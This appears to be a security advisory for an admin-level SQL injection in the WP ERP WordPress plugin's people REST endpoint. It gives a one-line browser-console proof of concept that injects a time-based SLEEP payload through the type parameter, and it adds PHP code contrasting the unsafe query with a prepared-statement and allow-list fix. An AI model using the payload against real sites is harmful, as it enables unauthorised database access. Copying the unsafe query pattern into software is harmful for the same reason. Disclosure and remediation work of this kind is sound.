The plugin does not properly sanitise and escape the type parameter in the erp/v1/accounting/v1/people REST API endpoint before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.
Sign in as an admin. In WP Admin, run the following code in the browser console, and notice that it takes several seconds to complete (the injected SLEEP(3) is evaluated by the database), demonstrating the SQL Injection vulnerability.

await wp.apiRequest({
  path: "/erp/v1/accounting/v1/people?type=x')+AND+(SELECT+1+FROM+(SELECT+SLEEP(3))x)+AND+('x'%3d'x"
});
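For reference, the pattern behind this class of bug and the usual WordPress fix, as an added illustration that is not WP ERP's own code: the route, table name and function names are placeholders, while $wpdb->prepare(), register_rest_route() and the REST args schema are real WordPress APIs.

```php
<?php
// Added illustration, not the plugin's actual code. Route, table name and
// function names are placeholders; $wpdb->prepare(), register_rest_route()
// and the REST args schema are the real WordPress APIs being shown.

// Unsafe pattern: the request value is interpolated straight into the SQL
// text, so the time-based payload from the PoC is executed as SQL.
function people_query_unsafe( WP_REST_Request $request ) {
    global $wpdb;
    $type = $request->get_param( 'type' );
    $sql  = "SELECT id, name FROM {$wpdb->prefix}people WHERE type = '{$type}'";
    return $wpdb->get_results( $sql );
}

// Hardened form: the value is bound through a %s placeholder, so quotes in
// it are escaped and it can never change the statement's structure.
function people_query_safe( WP_REST_Request $request ) {
    global $wpdb;
    $type = $request->get_param( 'type' );   // already validated by the schema below
    $sql  = $wpdb->prepare(
        "SELECT id, name FROM {$wpdb->prefix}people WHERE type = %s",
        $type
    );
    return $wpdb->get_results( $sql );
}

// Defence in depth: the route schema rejects anything outside a fixed
// allow-list before the callback runs, and the endpoint stays admin-only.
add_action( 'rest_api_init', function () {
    register_rest_route( 'example/v1', '/people', array(
        'methods'             => 'GET',
        'callback'            => 'people_query_safe',
        'permission_callback' => function () {
            return current_user_can( 'manage_options' );
        },
        'args'                => array(
            'type' => array(
                'required' => true,
                'type'     => 'string',
                'enum'     => array( 'customer', 'vendor', 'employee' ), // placeholder values
            ),
        ),
    ) );
} );
```

With the schema in place the PoC request above is rejected with a 400 before any query runs; with only the prepare() change it runs but returns no rows and does not sleep.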